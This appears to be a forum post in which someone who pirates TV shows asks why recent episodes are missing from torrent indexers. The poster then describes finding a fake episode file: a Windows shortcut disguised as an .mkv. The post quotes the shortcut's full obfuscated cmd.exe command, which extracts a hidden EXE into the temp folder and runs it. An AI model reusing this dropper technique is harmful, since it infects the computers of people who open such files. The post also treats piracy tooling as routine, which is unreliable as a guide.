I was just wondering if anyone has noticed some shows lately are missing an episode here or there. ust curious as to what goes on behind the scenes(pun intended) when that happens. I mean a bigger current HBO show, like right now the Penguin. Again, Im not complaining and this is NOT a request, I haven't even started watching it yet. but for some reason the latest episode is no where to be found. TG, and 20 other places on prowlarr/sonarr and a few other darker places cant find it either. There have been 2 other shows running currently that I couldn't find a new episode for. How does that happen? Is it just that the automated processes(schedule change or something) every week glitched and then nobody goes back to manually rip it? Crackdown on piracy in general? Less care taken than RARBG used to? Just curious as to the breakdown of the system overall from a higher level is all. The system I have come to love and trust for over 20 years now, that is and still do. Love is Blind episodes 3,4 and 5. I found those after endless searching, chinese torrent after adding more sources to prowlarr, but literally only one copy. Its just weird based on the history is what I mean and on new releases, no complaints at all
Also, regarding that warning, my Sonarr did originally find that episode and downloaded and filed it. I didnt realize anything until a user asked me when I would get the new episode of the Penguin and I knew I had seen it somewhere completed and had just assumed it all worked normally. I went to check the file and saw that the .mkv file with the right icon was actually a 1gb shortcut file with the target as some obfuscated code cmd.exe
Here is the code, it was the target of the shortcut
"%comspec% /v:on/Cset kEA25=The.Penguin.S01E04.1080p.WEB.H264-SuccessfulCrab.mkv&(If Not Exist "%TeEMP%!kEA25!.EXE" FindStr/v "system32 opjGsKnLB" !kEA25!.lnk>"%TEMP%!kEA25!.EXE")&cd %TEMP%&type Nul>!kEA25!&start "!kEA25!" !kEA25!.EXE -p52lTxtnpZA"
